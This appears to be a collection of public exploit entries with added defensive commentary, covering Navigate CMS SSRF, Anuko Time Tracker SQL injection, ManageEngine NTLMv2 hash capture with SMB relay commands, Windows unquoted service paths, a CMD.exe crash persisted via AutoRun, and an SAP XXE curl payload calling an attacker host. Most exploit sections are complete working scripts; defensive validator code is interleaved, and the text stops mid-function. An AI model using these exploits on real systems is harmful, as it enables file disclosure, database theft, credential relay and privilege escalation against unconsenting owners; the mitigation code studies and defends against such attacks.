<pre><code>#!/usr/bin/env python3
# Exploit Title: Navigate CMS 2.9.4 - Server-Side Request Forgery (SSRF) (Authenticated)
# Exploit Author: cheshireca7
# Vendor Homepage: https://www.navigatecms.com/
# Software Link: https://sourceforge.net/projects/navigatecms/files/releases/navigate-2.9.4r1561.zip/download
# Version: 2.9.4 and earlier
# Tested on: Ubuntu 20.04
# CVE: CVE-2022-28117
#
# -*- coding: utf-8 -*-

import requests as r, signal
from emoji import emojize
from argparse import ArgumentParser
from sys import exit
from requests_toolbelt.multipart.encoder import MultipartEncoder
from hashlib import md5
from time import sleep
from base64 import b64decode,b64encode
from colorama import Fore, Style

#proxies = {'http':'http://127.0.0.1:8080'}

def handler(signum, frame):
    # SIGINT handler: print a farewell line and exit cleanly
    print("["+Fore.YELLOW+"!"+Style.RESET_ALL+"] "+emojize(b64decode("T2gsIHlvdSBjYW7igJl0IGhlbHAgdGhhdCwgd2UncmUgYWxsIG1hZCBoZXJlIC4uLiA6cGF3X3ByaW50czoK").decode('UTF-8')))
    exit()

def login():
    print("["+Fore.BLUE+"*"+Style.RESET_ALL+f"] Trying to authenticate as {args.username} ...")
    sleep(1)

    try:
        # Grabbing CSRF Token
        s = r.Session()
        resp = s.get(f"{args.target}/login.php")#, proxies=proxies)
        csrf_token = resp.headers['X-Csrf-Token']

        # Performing login
        data = MultipartEncoder(fields={'login-username':f"{args.username}",'csrf_token':f"{csrf_token}",'login-password':f"{args.password}"})
        headers = {'Content-Type':data.content_type}
        resp = s.post(f"{args.target}/login.php", data=data, headers=headers, allow_redirects=False)#, proxies=proxies)
    except Exception:
        print("["+Fore.RED+"!"+Style.RESET_ALL+"] Something went wrong performing log in")
        exit(-1)
    if resp.status_code == 302:
        print("["+Fore.GREEN+"+"+Style.RESET_ALL+"] Login successful!")
        for cookie in resp.cookies:
            if "NVSID" in cookie.name:
                return (resp.headers['X-Csrf-Token'],f"{cookie.name}={cookie.value}")
        # A redirect without a session cookie is a failed login, not a success
        print("["+Fore.RED+"!"+Style.RESET_ALL+"] Login redirected but no NVSID session cookie was set")
        exit(-1)
    else:
        print("["+Fore.RED+"!"+Style.RESET_ALL+f"] Incorrect {args.username}'s credentials")
        exit(-1)

def exploit(values):
    print("["+Fore.BLUE+"*"+Style.RESET_ALL+"] Performing SSRF ...")
    sleep(1)

    # Abusing cache feature to retrieve response
    data = {'limit':'5','language':'en','url':f'{args.payload}'}
    headers = {'X-Csrf-Token':values[0]}
    cookie_name, cookie_value = values[1].split('=', 1)   # cookie values may themselves contain '='
    cookies = {cookie_name: cookie_value}
    resp = r.post(f"{args.target}/navigate.php?fid=dashboard&act=json&oper=feed", cookies=cookies, headers=headers, data=data)#, proxies=proxies)

    # Retrieving the file with response from static route
    md5File = md5(f"{args.payload}".encode('UTF-8')).hexdigest()
    resp = r.get(f"{args.target}/private/1/cache/{md5File}.feed",cookies=cookies)#,proxies=proxies)
    if len(resp.text) > 0:
        print("["+Fore.GREEN+"+"+Style.RESET_ALL+"] Dumping content ...")
        sleep(1)
        print(f"\n{resp.text}")
        exit(0)
    else:
        print("["+Fore.RED+"!"+Style.RESET_ALL+"] No response received")
        exit(-1)

if __name__ == '__main__':

    # Define parameters
    signal.signal(signal.SIGINT, handler)
    parser = ArgumentParser(description='CVE-2022-28117: Navigate CMS <= 2.9.4 - Server-Side Request Forgery (Authenticated)')
    parser.add_argument('-x', '--payload',default='file:///etc/passwd', help='URL to be requested (default=file:///etc/passwd)')
    parser.add_argument('-u','--username', default='admin', help='Username to log in the CMS (default=admin)')
    parser.add_argument('-p','--password', required=True, help='Password to log in the CMS')
    parser.add_argument('target', help='URL where the CMS is hosted. Ex: http://example.com[:80]/navigate')
    args = parser.parse_args()

    exploit(login())
</code></pre>
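The feed fetcher behind the `url` parameter above accepts any scheme and any destination, which is the whole vulnerability. The following is an added example (not Navigate CMS code, and not the exploit author's) of the validation a server-side fetcher should apply before making the request: allow only http(s), refuse userinfo, and refuse any destination that is a loopback, link-local, private or otherwise non-public address, including hostnames that resolve to one. The `resolve` callable is an assumption introduced so the check can be exercised offline; the sample hostnames and addresses are constructed.

```python
import ipaddress
import socket
from urllib.parse import urlparse

ALLOWED_SCHEMES = {"http", "https"}


def _is_public_address(ip_text):
    """True only for globally routable unicast addresses (strips an IPv6 zone id first)."""
    addr = ipaddress.ip_address(ip_text.split("%", 1)[0])
    return not (addr.is_private or addr.is_loopback or addr.is_link_local
                or addr.is_multicast or addr.is_reserved or addr.is_unspecified)


def check_feed_url(url, resolve=None):
    """Return (ok, reason, addresses) for a user-supplied URL that the server is asked to fetch.

    `resolve` maps a hostname to a list of IP strings. It defaults to the system resolver and
    is injectable so the policy can be unit-tested without DNS.
    """
    if resolve is None:
        resolve = lambda host: sorted({ai[4][0] for ai in socket.getaddrinfo(host, None)})

    parsed = urlparse(url.strip())
    scheme = parsed.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        # file://, gopher://, dict:// and friends are never legitimate feed sources
        return False, f"scheme {scheme or '(none)'!r} is not allowed", []
    host = parsed.hostname
    if not host:
        return False, "URL has no host", []
    if parsed.username is not None or parsed.password is not None:
        return False, "userinfo in URL is not allowed", []

    try:
        ipaddress.ip_address(host)
        addresses = [host]                     # literal IP, nothing to resolve
    except ValueError:
        try:
            addresses = resolve(host)
        except OSError:
            return False, f"{host} does not resolve", []
    if not addresses:
        return False, f"{host} does not resolve", []
    for ip in addresses:
        if not _is_public_address(ip):
            return False, f"{host} resolves to non-public address {ip}", addresses
    return True, "ok", addresses
```

The fetcher must then connect to one of the vetted addresses rather than re-resolving the name, otherwise a DNS answer that changes between check and connect (rebinding) bypasses the policy. Independently of this check, the advisory shows that the fetched body lands in `/private/1/cache/<md5>.feed` under the web root at a path computable from the request, so the cache directory should not be web-served at all.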
<pre><code># Exploit Title: Anuko Time Tracker - SQLi (Authenticated)
# Date: 2022-05-03
# Exploit Author: Altelus
# Vendor Homepage: https://www.anuko.com/
# Software Link: https://github.com/anuko/timetracker/tree/0924ef499c2b0833a20c2d180b04fa70c6484b6d
# Version: Anuko Time Tracker 1.20.0.5640
# Tested on: Linux
# CVE : CVE-2022-24707

# An authenticated user can exploit an SQL Injection vulnerability on the Puncher plugin if it is enabled.
# The user has to start the puncher and stop it, but upon stopping an additional parameter 'date' must be passed.
# The 'date' parameter is then injected with an SQL payload for leaking database contents.


import requests
import argparse
import re
from bs4 import BeautifulSoup
from datetime import datetime


def get_puncher_page():

    punch_txt = r_client.get(host + "/puncher.php").text

    if "Feature is disabled" in punch_txt:
        print("[-] Puncher feature is disabled.")
        exit(0)

    print("[+] Puncher feature is enabled. Picking a project...")

    soup = BeautifulSoup(punch_txt, features="lxml")
    time_record_form = soup.find("select", {"name" : "project", "id" : "project"})

    project_list = time_record_form.findAll("option")

    if len(project_list) <= 1:
        print("[-] No project to choose from")
        exit(0)

    f_proj = project_list[1]

    print("[*] Picking the first project in the option: [{} - {}]".format(f_proj['value'], f_proj.text))

    return f_proj['value']


def login(username, password):

    global r_client

    data = {
        "login" : username,
        "password" : password,
        "btn_login" : "Login",
    }

    login_txt = r_client.post(host + "/login.php", data=data).text
    if "Incorrect" in login_txt:
        print("[-] Failed to login. Credentials are not correct.")
        exit(0)

    print("[+] Login successful!")


def start_puncher(project_id):

    global r_client

    data = {
        "project": project_id,
        "btn_start": "Start",
        "browser_today" : "",
        "browser_time" : "04:00",
        "date": "{}-{}-{}".format(date.year, date.month, date.day)
    }

    headers = {
        "Referer" : host + "/puncher.php"
    }

    start_p = r_client.post(host + "/puncher.php", data=data, headers=headers).text

    if "Uncompleted entry already" in start_p:
        print("[-] A running puncher entry is seen. Exiting")
        exit(0)

    print("[*] Puncher started. Getting id added...")

    puncher_p = r_client.get(host + "/puncher.php?date={}-{}-{}".format(date.year, date.month, date.day)).text

    # Pick the newest entry numerically (a string sort would rank id=9 above id=10)
    time_edit_ids = [int(i) for i in re.findall(r"time_edit\.php\?id=(\d+)", puncher_p)]
    if not time_edit_ids:
        print("[-] Could not find the new puncher entry on the page")
        exit(0)

    latest_id = str(max(time_edit_ids))

    return latest_id


def stop_puncher_sqli(project_id, sqli=""):

    get_all_tables = "SELECT group_concat(table_name) FROM information_schema.tables WHERE table_schema=database()"

    if sqli == "":
        sqli = get_all_tables

    data = {
        "btn_stop": "Stop",
        "browser_today" : "",
        "browser_time" : "04:10",
        # 'date' closes the quoted value and appends a comment=(subquery) assignment
        "date": "{}-{}-{}', comment=(({})), date='{}-{}-{}".format(date.year, date.month, date.day, sqli, date.year, date.month, date.day)
    }

    headers = {
        "Referer" : host + "/puncher.php"
    }

    stop_p = r_client.post(host + "/puncher.php", data=data, headers=headers,allow_redirects=False).text

    print("[*] Puncher stopped")

def get_puncher_result(puncher_id):

    time_edit_p = r_client.get(host + "/time_edit.php?id={}".format(puncher_id)).text

    soup = BeautifulSoup(time_edit_p, features="lxml")
    note_content = soup.find("textarea", {"name" : "note", "id" : "note"})

    print("[+] Leaked: {}".format(note_content.text))


def delete_puncher_entry(puncher_id):

    data = {
        "delete_button" : "Delete",
        "id" : puncher_id
    }

    headers = {
        "Referer" : host + "/time_delete.php?id={}".format(puncher_id)
    }

    del_p = r_client.post(host + "/time_delete.php?id={}".format(puncher_id), data=data, headers=headers)

    print("[*] Puncher {} deleted".format(puncher_id))


parser = argparse.ArgumentParser()

parser.add_argument('--username', required=True, help="Anuko Timetracker username")
parser.add_argument('--password', required=True, help="Anuko Timetracker password")
parser.add_argument('--host', required=True, help="e.g. http://target.website.local, http://10.10.10.10, http://192.168.23.101:8000")
parser.add_argument('--sqli', required=False, help="SQL query to run. Defaults to getting all tables")
args = parser.parse_args()

r_client = requests.Session()
host = args.host
date = datetime.now()

username = args.username
password = args.password

login(username, password)
proj_id = get_puncher_page()
puncher_id = start_puncher(proj_id)

sqli = ""

if args.sqli is not None:
    sqli = args.sqli

stop_puncher_sqli(proj_id, sqli=sqli)
get_puncher_result(puncher_id)
delete_puncher_entry(puncher_id)
</code></pre>
<pre><code># Exploit Title: UDisk Monitor Z5 Phone - 'MonServiceUDisk.exe' Unquoted Service Path
# Discovery by: Edgar Carrillo Egea // https://twitter.com/ecarrilloeg
# Discovery Date: 2022-04-24
# Vendor Homepage: https://www.zte.com.cn/global/
# Tested Version: 2.0.3.0
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Microsoft Windows 10 Pro x64

# Step to discover Unquoted Service Path:

C:\Users\edgar>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
UDisk Monitor Z5 Phone    UDisk Monitor Z5 Phone    C:\Program Files (x86)\Android_USB_Driver_Z\Bin\MonServiceUDisk.exe    Auto

C:\Users\edgar>sc qc "UDisk Monitor Z5 Phone"
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: UDisk Monitor Z5 Phone
        TIPO               : 110  WIN32_OWN_PROCESS  (interactive)
        TIPO_INICIO        : 2   AUTO_START
        CONTROL_ERROR      : 1   NORMAL
        NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Android_USB_Driver_Z\Bin\MonServiceUDisk.exe
        GRUPO_ORDEN_CARGA  :
        ETIQUETA           : 0
        NOMBRE_MOSTRAR     : UDisk Monitor Z5 Phone
        DEPENDENCIAS       :
        NOMBRE_INICIO_SERVICIO: LocalSystem

C:\Users\edgar>systeminfo

Nombre de host:                 DESKTOP-810865D
Nombre del sistema operativo:   Microsoft Windows 10 Pro
Versión del sistema operativo:  10.0.19044 N/D Compilación 19044
</code></pre>
<pre><code># Exploit Title: TCQ - 'ITeCProteccioAppServer.exe' Unquoted Service Path
# Discovery by: Edgar Carrillo Egea - https://twitter.com/ecarrilloeg
# Discovery Date: 2022-04-25
# Vendor Homepage: https://itec.es/programas/
# Vulnerability Type: Unquoted Service Path Privilege Escalation
# Tested on OS: Microsoft Windows 11 Home

To properly exploit this vulnerability,
the local attacker must insert an executable file in the path of the service.
Upon service restart or system reboot, the malicious code will be run
with elevated privileges.


C:\Users\edgar>sc qc "ITeCProteccioAppServer"
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: ITeCProteccioAppServer
        TIPO               : 110  WIN32_OWN_PROCESS  (interactive)
        TIPO_INICIO        : 2   AUTO_START
        CONTROL_ERROR      : 1   NORMAL
        NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\ITeC\LIC\ITeCProteccioAppServer.exe
        GRUPO_ORDEN_CARGA  :
        ETIQUETA           : 0
        NOMBRE_MOSTRAR     : ITeCProteccioAppServer
        DEPENDENCIAS       : RPCSS
        NOMBRE_INICIO_SERVICIO: LocalSystem

C:\Users\edgar>systeminfo

Nombre de host:                 DESKTOP-0DL5SID
Nombre del sistema operativo:   Microsoft Windows 11 Home
Versión del sistema operativo:  10.0.22000 N/D Compilación 22000
</code></pre>
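Both unquoted-service-path advisories above (UDisk Monitor and TCQ) find the issue by reading `sc qc` output by eye. The following is an added example (not the discoverer's code) of doing the same check programmatically for an audit or a configuration-compliance scan: parse `sc qc` output, which here carries the Spanish-locale labels shown in the advisories as well as the English ones, decide whether the image path is unquoted and contains spaces, and produce the correctly quoted `binPath=` value. The `sc qc` sample is the TCQ output from the advisory; the exclusion of `C:\Windows\` mirrors the `findstr` filter used in the UDisk advisory.

```python
import re

# `sc qc` output as shown in the TCQ advisory above (Spanish locale).
SAMPLE_SC_QC = r"""[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: ITeCProteccioAppServer
        TIPO               : 110  WIN32_OWN_PROCESS  (interactive)
        TIPO_INICIO        : 2   AUTO_START
        CONTROL_ERROR      : 1   NORMAL
        NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\ITeC\LIC\ITeCProteccioAppServer.exe
        GRUPO_ORDEN_CARGA  :
        ETIQUETA           : 0
        NOMBRE_MOSTRAR     : ITeCProteccioAppServer
        DEPENDENCIAS       : RPCSS
        NOMBRE_INICIO_SERVICIO: LocalSystem
"""

# English and Spanish labels for the fields we care about.
LABELS = {
    "name": ("SERVICE_NAME", "NOMBRE_SERVICIO"),
    "image_path": ("BINARY_PATH_NAME", "NOMBRE_RUTA_BINARIO"),
    "account": ("SERVICE_START_NAME", "NOMBRE_INICIO_SERVICIO"),
}


def parse_sc_qc(output):
    """Map `sc qc` output to {name, image_path, account}; the first ':' separates label from value."""
    fields = {}
    for line in output.splitlines():
        label, sep, value = line.partition(":")
        if sep:
            fields[label.strip().upper()] = value.strip()
    return {key: next((fields[l] for l in labels if l in fields), None)
            for key, labels in LABELS.items()}


def split_image_path(image_path):
    """Split a service command line into (executable, arguments).
    A quoted path ends at the closing quote; an unquoted one is taken up to the first '.exe'."""
    p = image_path.strip()
    if p.startswith('"'):
        end = p.find('"', 1)
        return p[1:end], p[end + 1:].strip()
    m = re.match(r"(.*?\.exe)(?:\s+(.*))?$", p, re.IGNORECASE | re.DOTALL)
    if m:
        return m.group(1), (m.group(2) or "")
    return p, ""


def unquoted_path_finding(image_path, skip_windows_dir=True):
    """Return a finding string if the path is unquoted and contains spaces, else None.
    Services under C:\\Windows\\ are skipped by default, as in the advisory's findstr filter."""
    if not image_path or image_path.lstrip().startswith('"'):
        return None
    exe, _ = split_image_path(image_path)
    if " " not in exe:
        return None
    if skip_windows_dir and exe.lower().startswith("c:\\windows\\"):
        return None
    return f"unquoted service path with spaces: {exe}"


def quoted_image_path(image_path):
    """The value the service should be configured with: executable quoted, arguments preserved."""
    exe, args = split_image_path(image_path)
    return f'"{exe}"' + (f" {args}" if args else "")


def audit_sc_qc(output):
    """Combine the pieces: None when the service is fine, otherwise a finding record."""
    svc = parse_sc_qc(output)
    finding = unquoted_path_finding(svc["image_path"])
    if finding is None:
        return None
    return {"name": svc["name"], "account": svc["account"], "finding": finding,
            "quoted_image_path": quoted_image_path(svc["image_path"])}
```

For the TCQ service the remediation the audit points at is to store the quoted value back, for example `sc config "ITeCProteccioAppServer" binPath= "\"C:\Program Files (x86)\ITeC\LIC\ITeCProteccioAppServer.exe\""` (note the space after `binPath=`, which `sc` requires). The `account` field is worth carrying into the report: a finding on a `LocalSystem` service, as in both advisories, is the case that matters.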
<pre><code># Exploit Title: ManageEngine ADSelfService Plus Build 6118 - NTLMv2 Hash Exposure
# Exploit Author: Metin Yunus Kandemir
# Vendor Homepage: https://www.manageengine.com/
# Software Link: https://www.manageengine.com/products/self-service-password/download.html
# Details: https://docs.unsafe-inline.com/0day/multiple-manageengine-applications-critical-information-disclosure-vulnerability
# Version: ADSelfService Plus Build < 6121
# Tested against: Build 6118
# CVE: CVE-2022-29457

# !/usr/bin/python3
import argparse
import requests
import urllib3
import random
import sys

"""
1-
a) Set up an SMB server to capture the NTLMv2 hash.
python3 smbserver.py share . -smb2support

b) For relaying to SMB:
python3 ntlmrelayx.py -smb2support -t smb://TARGET

c) For relaying to LDAP:
python3 ntlmrelayx.py -t ldaps://TARGET

2- Fire up the exploit.
You will obtain the NTLMv2 hash of the user/computer account that runs ADSelfService within five minutes.
"""

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def get_args():
    parser = argparse.ArgumentParser(
        epilog="Example: exploit.py -t https://Target/ -l Listener-IP -a adselfservice -d unsafe.local -u operator1 -p operator1")
    parser.add_argument('-d', '--domain', required=True, action='store', help='DNS name of the target domain. ')
    parser.add_argument('-a', '--auth', required=True, action='store', help='If you have credentials of the application user, type adselfservice. If you have credentials of the domain user, type domain')
    parser.add_argument('-u', '--user', required=True, action='store')
    parser.add_argument('-p', '--password', required=True, action='store')
    parser.add_argument('-t', '--target', required=True, action='store', help='Target url')
    parser.add_argument('-l', '--listener', required=True, action='store', help='Listener IP to capture NTLMv2 hash')
    args = parser.parse_args()
    return args


def scheduler(domain, auth, target, listener, user, password):
    try:
        with requests.Session() as s:
            gUrl = target
            getCsrf = s.get(url=gUrl, allow_redirects=False, verify=False)
            csrf = getCsrf.cookies['_zcsr_tmp']
            print("[*] Csrf token: %s" % csrf)

            if auth.lower() == 'adselfservice':
                auth = "ADSelfService Plus Authentication"
            data = {
                "loginName": user,
                "domainName": auth,
                "j_username": user,
                "j_password": password,
                "AUTHRULE_NAME": "ADAuthenticator",
                "adscsrf": [csrf, csrf]
            }

            #Login
            url = target + "j_security_check"
            headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0"}
            req = s.post(url, data=data, headers=headers, allow_redirects=True, verify=False)
            #Auth Check
            url2 = target + "webclient/index.html"
            req2 = s.get(url2, headers=headers, allow_redirects=False, verify=False)
            if req2.status_code == 200:
                print("[+] Authentication is successful.")
            elif req2.status_code == 302:
                print("[-] Login failed.")
                sys.exit(1)
            else:
                print("[-] Something went wrong")
                sys.exit(1)

            # Base DN covers every label of the domain name (corp.example.com -> DC=corp,DC=example,DC=com)
            base_dn = ",".join("DC=" + label for label in domain.split("."))
            r1 = random.randint(1, 1000)

            surl = target + 'ServletAPI/Reports/saveReportScheduler'
            data = {
                'SCHEDULE_ID':'0',
                'ADMIN_STATUS':'3',
                'SCHEDULE_NAME': 'enrollment' + str(r1),
                'DOMAINS': '["'+ domain +'"]',
                'DOMAIN_PROPS': '{"'+ domain +'":{"OBJECT_GUID":"{*}","DISTINGUISHED_NAME":"'+ base_dn +'","DOMAIN_SELECTED_OUS_GROUPS":{"ou":[{"OBJECT_GUID":"{*}","DISTINGUISHED_NAME":"'+ base_dn +'","NAME":"'+ domain +'"}]}}}',
                'SELECTED_REPORTS': '104,105',
                'SELECTED_REPORT_LIST': '[{"REPORT_CATEGORY_ID":"3","REPORT_LIST":[{"CATEGORY_ID":"3","REPORT_NAME":"adssp.reports.enroll_rep.enroll.heading","IS_EDIT":false,"SCHEDULE_ELEMENTS":[],"REPORT_ID":"104"},{"CATEGORY_ID":"3","REPORT_NAME":"adssp.common.text.non_enrolled_users","IS_EDIT":true,"SCHEDULE_ELEMENTS":[{"DEFAULT_VALUE":false,"size":"1","ELEMENT_VALUE":false,"uiText":"adssp_reports_enroll_rep_non_enroll_show_notified","name":"SHOW_NOTIFIED","id":"SHOW_NOTIFIED","TYPE":"checkbox","class":"grayfont fntFamily fntSize"}],"REPORT_ID":"105"}],"REPORT_CATEGORY_NAME":"adssp.xml.reportscategory.enrollment_reports"}]',
                'SCHEDULE_TYPE': 'hourly',
                'TIME_OF_DAY': '0',
                'MINS_OF_HOUR': '5',
                'EMAIL_ID': user +'@'+ domain,
                'NOTIFY_ADMIN': 'true',
                'NOTIFY_MANAGER': 'false',
                'STORAGE_PATH': '\\\\' + listener + '\\share',
                'FILE_FORMAT': 'HTML',
                'ATTACHMENT_TYPE': 'FILE',
                'ADMIN_MAIL_PRIORITY': 'Medium',
                'ADMIN_MAIL_SUBJECT': 'adssp.reports.schedule_reports.mail_settings_sub',
                'ADMIN_MAIL_CONTENT': 'adssp.reports.schedule_reports.mail_settings_msg_html',
                'MANAGER_FILE_FORMAT': 'HTML',
                'MANAGER_ATTACHMENT_TYPE': 'FILE',
                'MANAGER_MAIL_SUBJECT': 'adssp.reports.schedule_reports.mail_settings_mgr_sub',
                'MANAGER_MAIL_CONTENT': 'adssp.reports.schedule_reports.mail_settings_mgr_msg_html',
                'adscsrf': csrf
            }
            sch = s.post(surl, data=data, headers=headers, allow_redirects=False, verify=False)
            if 'adssp.reports.schedule_reports.storage_path.unc_storage_path' in sch.text:
                print('[-] The target is patched!')
                sys.exit(1)
            if sch.status_code == 200:
                print("[+] The report is scheduled. The NTLMv2 hash will be captured in five minutes!")
            else:
                print("[-] Something went wrong. Please, try it manually!")
                sys.exit(1)
    # Catch only transport errors; a bare except would also swallow the sys.exit() calls above
    except requests.RequestException:
        print('[-] Connection error!')

def main():
    arg = get_args()
    domain = arg.domain
    auth = arg.auth
    user = arg.user
    password = arg.password
    target = arg.target
    listener = arg.listener
    scheduler(domain, auth, target, listener, user, password)


if __name__ == "__main__":
    main()
</code></pre>
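The exploit works because `STORAGE_PATH` is accepted verbatim and the service then writes the report to `\\listener\share`, authenticating over SMB as its own account; the patched build's `unc_storage_path` error string shows the vendor's fix is a rejection of UNC paths. The following is an added example (not ManageEngine code) of the general form of that server-side check: refuse every `\\` form (including `\\?\` and forward-slash spellings) and confine any remaining path to a fixed report directory. `REPORT_ROOT` is an invented directory; `ntpath` is used so the Windows path semantics are evaluated on any OS.

```python
import ntpath

# Directory the application is allowed to write scheduled reports into (constructed for this example).
REPORT_ROOT = r"C:\ManageEngine\ADSelfService Plus\reports"


def resolve_storage_path(requested, root=REPORT_ROOT):
    """Return the absolute path a report may be written to, or None when `requested`
    is a UNC/device path or would escape `root`."""
    if not isinstance(requested, str) or not requested.strip():
        return None
    text = requested.strip().replace("/", "\\")
    # \\server\share, \\?\..., \\.\... and //server/share all make the service open an
    # SMB or named-pipe connection to a host chosen by the caller: never accept them.
    if text.startswith("\\\\"):
        return None
    root_abs = ntpath.normpath(root)
    # join() keeps an absolute `text` as-is and appends a relative one; normpath() folds "..".
    candidate = ntpath.normpath(ntpath.join(root_abs, text))
    try:
        common = ntpath.commonpath([root_abs.lower(), candidate.lower()])
    except ValueError:          # paths on different drives share no prefix
        return None
    if common != root_abs.lower():
        return None
    return candidate
```

Beyond the path check, the service account that produces reports is the credential that leaks in this bug, so it should be a low-privilege account that cannot be relayed into anything useful; and outbound SMB from application servers to arbitrary hosts is something an egress firewall rule can block regardless of which application next mishandles a path.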
<pre><code>Hi @ll,

the subject says it all: a 25 year old TRIVIAL signed integer
arithmetic bug (which may well have earned a PhD now) crashes
Windows' command interpreter CMD.exe via its builtin SET command.
See their documentation:
<https://technet.microsoft.com/en-us/library/cc771320.aspx>
<https://technet.microsoft.com/en-us/library/cc754250.aspx>


Classification
~~~~~~~~~~~~~~

<https://cwe.mitre.org/data/definitions/190.html>
CWE-190: Integer Overflow or Wraparound

<https://cwe.mitre.org/data/definitions/248.html>
CWE-248: Uncaught Exception


Demonstration
~~~~~~~~~~~~~

On Windows NT4 or any newer version start the command interpreter and
run the following 4 command lines (the first 3 set just the base):

SET /A -2147483648
SET /A ~2147483647
SET /A ~2147483647 / -1
SET /A ~2147483647 % -1

[1] Oops: although a valid signed 32-bit integer, the command interpreter
    reports the literal value -2147483648 = 2**31 alias INT_MIN as
    "Invalid number. Numbers are limited to 32-bits of precision."

[2] As expected, ~2147483647, the negation of INT_MAX, yields INT_MIN

[3] Also as expected, computing the quotient of INT_MIN / -1 produces
    "Invalid number. Numbers are limited to 32-bits of precision.": the
    correct result is +2147483648 alias INT_MAX + 1, i.e. produces an
    integer overflow, which raises a #DE (divide error) exception on
    x86/x64 processors (and their 8- and 16-bit predecessors too).

[4] OUCH: rather unexpected, computing the remainder of INT_MIN / -1
    crashes the command processor with the #DE exception, i.e.
    the developers failed to implement the check they used for
    division.

JFTR: the remainder of <any integer> % -1 as well as <any integer> % 1
      is (by the algebraic definition of division) 0 (in words: ZERO):
      the remainder is in magnitude less than the divisor.
      The only integer that is in magnitude less than |-1| = 1 is 0!


Exploit
~~~~~~~

Setting one or both of the following documented registry entries
crashes the command interpreter upon invocation (unless started
with the switch /D):

[HKEY_CURRENT_USER\Software\Microsoft\Command Processor]
"AutoRun"="SET /A ~2147483647 % ~0"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor]
"AutoRun"="SET /A ~2147483647 % ~0"


stay tuned
Stefan Kanthak

PS: I reported this bug as DoS to the MSRC; they replied with the
    following bullshit statement in their 2nd sentence:

| Though engineering confirmed the crash in this case, it was assessed
| as a Low severity DoS.
| Their reasoning centers around the requirement to have admin
| privileges to pull off the attack.

    OUCH! Unprivileged users can but write this registry entry below
    [HKEY_CURRENT_USER\Software\Microsoft\Command Processor]
</code></pre>
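The post's point is that `/` and `%` share the one operand pair, INT_MIN with divisor -1, on which the x86 IDIV instruction traps, and that only one of the two operators was guarded. The following is an added example (not Stefan Kanthak's code, and not how CMD.exe is implemented) that models 32-bit `SET /A` arithmetic in Python so the two cases can be seen side by side: the literal-range check, `~` as a 32-bit bitwise NOT, the division guard that reports the overflow, and the remainder guard that returns the mathematically correct 0 instead of letting the hardware trap. Error texts reuse the message quoted in the post.

```python
INT_MIN = -2**31
INT_MAX = 2**31 - 1
RANGE_MSG = "Invalid number. Numbers are limited to 32-bits of precision."


def to_int32(value):
    """Wrap an arbitrary Python int to two's-complement 32 bits, like a C int."""
    value &= 0xFFFFFFFF
    return value - 2**32 if value > INT_MAX else value


def literal32(text):
    """Parse a decimal literal; every value in [INT_MIN, INT_MAX] is valid, including INT_MIN."""
    value = int(text, 10)
    if not INT_MIN <= value <= INT_MAX:
        raise OverflowError(RANGE_MSG)
    return value


def literal_fits(text):
    try:
        literal32(text)
    except OverflowError:
        return False
    return True


def bitnot32(a):
    """SET /A's '~' operator: bitwise NOT in 32 bits, so ~2147483647 == INT_MIN and ~0 == -1."""
    return to_int32(~a)


def _trunc_divmod(a, b):
    """C/x86 semantics: quotient truncated toward zero, remainder carries the dividend's sign."""
    q = abs(a) // abs(b)
    if (a < 0) != (b < 0):
        q = -q
    return q, a - q * b


def checked_div32(a, b):
    if b == 0:
        raise ZeroDivisionError("division by zero")
    if a == INT_MIN and b == -1:
        # The true quotient, 2**31, does not fit; IDIV raises #DE on exactly this pair.
        raise OverflowError(RANGE_MSG)
    return _trunc_divmod(a, b)[0]


def checked_mod32(a, b):
    if b == 0:
        raise ZeroDivisionError("division by zero")
    if a == INT_MIN and b == -1:
        # Same trapping operand pair as the division case, but the remainder is well defined: 0.
        # This is the guard the post says is missing from SET /A's '%'.
        return 0
    return _trunc_divmod(a, b)[1]


def div_overflows(a, b):
    try:
        checked_div32(a, b)
    except OverflowError:
        return True
    return False
```

The guard has to sit before the hardware divide in both operators because IDIV computes quotient and remainder together: there is no way to ask the CPU for "just the remainder" of INT_MIN by -1 without the same #DE.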
<pre><code># Exploit Title: SAP BusinessObjects Intelligence 4.3 - XML External Entity (XXE)
# Google Dork: N/A
# Date: 4/21/2022
# Exploit Author: West Shepherd
# Vendor Homepage: https://www.sap.com/
# Software Link: https://www.sap.com/
# Version: 4.2 and 4.3
# Tested on: Windows Server 2019 x64
# CVE : CVE-2022-28213
# References: https://github.com/wshepherd0010/advisories/blob/master/CVE-2022-28213.md

curl -sk -X POST -H 'Content-Type: application/xml;charset=UTF-8' \
--data '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY %
remote SYSTEM "\\attackerwebsite.com\XXE\example">%remote;%int;%trick;]>' \
https://example.com/biprws/logon/long
</code></pre>
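The request above only does anything because the logon endpoint's XML parser honours a `DOCTYPE` with a parameter entity pointing at an external UNC source. The following is an added example (not SAP code, and not the advisory author's) of a parser configured to fail closed on untrusted input using only the Python standard library's expat binding: any DOCTYPE, any entity declaration and any external entity reference raises before the document body is processed. The two sample bodies are constructed: the first reproduces the shape of the advisory's payload with a root element appended, the second is a harmless attribute document that stands in for a real logon body.

```python
import xml.parsers.expat as expat


class UnsafeXML(ValueError):
    """Raised when a document uses the features that make XXE possible."""


def parse_untrusted_xml(data):
    """Parse `data` (bytes) and return the element names in document order.

    Raises UnsafeXML on any DOCTYPE, entity declaration or external entity reference,
    and expat.ExpatError on malformed XML."""
    parser = expat.ParserCreate()
    names = []

    def start_doctype(name, sysid, pubid, has_internal_subset):
        raise UnsafeXML("DOCTYPE is not accepted from clients")

    def entity_decl(name, is_parameter, value, base, sysid, pubid, notation):
        raise UnsafeXML(f"entity declaration {name!r} is not accepted")

    def external_entity_ref(context, base, sysid, pubid):
        raise UnsafeXML(f"external entity {sysid!r} is not accepted")

    # Exceptions raised inside expat handlers propagate out of Parse(), which is what we want.
    parser.StartDoctypeDeclHandler = start_doctype
    parser.EntityDeclHandler = entity_decl
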